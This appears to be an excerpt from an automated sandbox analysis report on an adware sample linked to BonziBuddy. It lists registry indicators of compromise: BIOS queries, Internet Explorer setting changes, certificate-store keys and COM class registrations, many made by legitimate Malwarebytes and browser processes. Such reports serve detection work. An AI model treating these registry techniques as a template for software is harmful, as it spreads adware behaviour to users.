Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies Internet Explorer settings 1 TTPs 47 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEBonziBDY_4.EXEMBAMInstallerService.exeMBAMService.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "263030132"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31118271"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "262874156"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "261780116"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "261780116"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31118271"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31118271"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31118271"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31118271"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\Main	BonziBDY_4.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	MBAMInstallerService.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "283654840"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "427487001"	iexplore.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbam.exe = "11000"	MBAMService.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbamtray.exe = "11000"	MBAMService.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "272875245"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{3B37A8E5-3FB2-11EF-8B18-EEFA7036A957} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Malwarebytes.exe = "11000"	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	MBAMService.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31118271"	IEXPLORE.EXE

Modifies data under HKEY_USERS 64 IoCs

Processes:

MBAMService.exembupdatrV5.exeMBAMInstallerService.exeMBAMWsc.exeDrvInst.exembupdatrV5.exechrome.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	MBAMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	mbupdatrV5.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	MBAMWsc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	MBAMWsc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\15.0\Common	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	MBAMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	MBAMService.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:\	MBAMInstallerService.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:\	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	MBAMWsc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications	MBAMInstallerService.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:\	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	mbupdatrV5.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	MBAMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	mbupdatrV5.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	MBAMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MBAMWsc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	MBAMWsc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	MBAMWsc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	MBAMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	MBAMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	mbupdatrV5.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	mbupdatrV5.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	MBAMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	MBAMWsc.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common	MBAMInstallerService.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:\	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	MBAMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	mbupdatrV5.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	MBAMWsc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	MBAMWsc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	MBAMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	mbupdatrV5.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies	MBAMInstallerService.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	mbupdatrV5.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Malwarebytes	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	mbupdatrV5.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	MBAMWsc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	mbupdatrV5.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	MBAMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	mbupdatrV5.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols	MBAMInstallerService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe

Modifies registry class 64 IoCs

Processes:

MBAMService.exeBonziBuddy432.exeregsvr32.exeMBAMService.exeAgentSvr.exeBonziBDY_35.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{99E6F3FE-333C-462C-8C39-BC27DCA4A80E}\TypeLib\ = "{FFB94DF8-FC15-411C-B443-E937085E2AC1}"	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8C842243-BDAD-4A93-B282-93E3FCBC1CA4}\TypeLib	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3B24818-1CC9-4825-96A9-1DB596E079C8}\TypeLib\Version = "1.0"	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A993F934-6341-4D52-AB17-F93184A624E4}\TypeLib\Version = "1.0"	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{972DE6C2-8B09-11D2-B652-A1FD6CC34260}\Insertable	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EB52CF7B-3917-11CE-80FB-0000C0C14E92}\InprocServer32\ThreadingModel = "Apartment"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D45FD31B-5C6E-11D1-9EC1-00C04FD7081F}\VersionIndependentProgID\ = "Agent.Control"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{53FA8D4E-2CDD-11D3-9DD0-D3CD4078982A}\TypeLib	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B471ACFB-E67A-4BE9-A328-F6A906DDDEAA}\ProxyStubClsid32	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{81541635-736E-4460-81AA-86118F313CD5}\TypeLib	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55D0C28B-2BF3-4230-B48D-DB2C2D7BF6F8}\TypeLib\ = "{A82129F1-32E1-4D79-A39F-EBFEE53A70BF}"	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{14E27A73-69F0-11CE-9425-0000C0C14E92}\ProxyStubClsid32	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5BE8BE3-7DE6-11D0-91FE-00C04FD701A5}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8563FF20-8ECC-11D1-B9B4-00C04FD97575}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4A0A45F1-CFB6-49A7-BBC4-8776F94857A8}\TypeLib\Version = "1.0"	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A34647B-D9A8-40D9-B563-F9461E98030E}\ProxyStubClsid32	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DB82CDC6-F12A-4156-8DBF-EC7465B9C0B9}\TypeLib\ = "{59DBD1B8-A7BD-4322-998F-41B0D2516FA0}"	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FC60FEE4-E373-4962-B548-BA2E06119D54}\TypeLib	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{172ABF99-1426-47CA-895B-092E23728E8A}\ProxyStubClsid32	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{25321640-5EF1-4095-A0DA-30DE19699441}\ProxyStubClsid32	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{972DE6B5-8B09-11D2-B652-A1FD6CC34260}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FB81F893-5D01-4DFD-98E1-3A6CB9C3E63E}\TypeLib	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A993F934-6341-4D52-AB17-F93184A624E4}\TypeLib	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C0D8223D-D594-4147-BAD8-1E2B54ED1990}	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDD1F04B-858B-11D1-B16A-00C0F0283628}\Control	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SSCalendar.SSMonthCtrl.1\ = "SSMonth Control"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B0913410-3B44-11D1-ACBA-00C04FD97575}\ = "IAgentCtlCommandEx"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3BD2053F-99D1-4C2B-8B45-635183A8F0BF}\ = "IMWACControllerV6"	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FFBD938D-3ABA-4895-97EF-5A0BDF7AC07D}\TypeLib	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{53FA8D40-2CDD-11D3-9DD0-D3CD4078982A}\TypeLib\ = "{972DE6B5-8B09-11D2-B652-A1FD6CC34260}"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2C247F23-8591-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DECC98E1-EC4E-11D2-93E5-00104B9E078A}\TypeLib	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{19184D37-6938-4F54-BAFD-3240F0FA75E6}\TypeLib\ = "{49F6AC60-2104-42C6-8F71-B3916D5AA732}"	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ActiveSkin.SkinStorage\CLSID	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{972DE6C3-8B09-11D2-B652-A1FD6CC34260}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5083B4CA-BBA6-43DD-B36E-DEA787CA0CAD}	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{AFF1A83B-6C83-4342-8E68-1648DE06CB65}\1.0\0	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F04A-858B-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C247F21-8591-11D1-B16A-00C0F0283628}\ = "IImageList"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C247F24-8591-11D1-B16A-00C0F0283628}\TypeLib	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1AC7139-D1FF-4DE9-84A4-92E2B47F5D2A}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\""	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{ABC1D1AF-23ED-4483-BDA4-90BCC21DFBDB}\TypeLib\ = "{783B187E-360F-419C-B6DA-592892764A01}"	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FA6C70E7-6A6D-4F4A-99BF-C8B375CB7E0C}\ = "ILinker"	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D45FD31B-5C6E-11D1-9EC1-00C04FD7081F}\ToolboxBitmap32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6B976285-3692-11D0-9B8A-0000C0F04C96}\TypeLib\Version = "3.0"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{065E6FD3-1BF9-11D2-BAE8-00104B9E0792}\TypeLib	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E91E27A3-C5AE-11D2-8D1B-00104B9E072A}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A7B93C8D-7B81-11D0-AC5F-00C04FD97575}\TypeLib	AgentSvr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D51C573D-B305-4980-8DFF-076C1878CCFB}	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{778103CC-4FA4-42AC-8981-D6F11ACC6B7F}\ = "IScanControllerV19"	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A7B93C73-7B81-11D0-AC5F-00C04FD97575}\2.0\0\win32	AgentSvr.exe
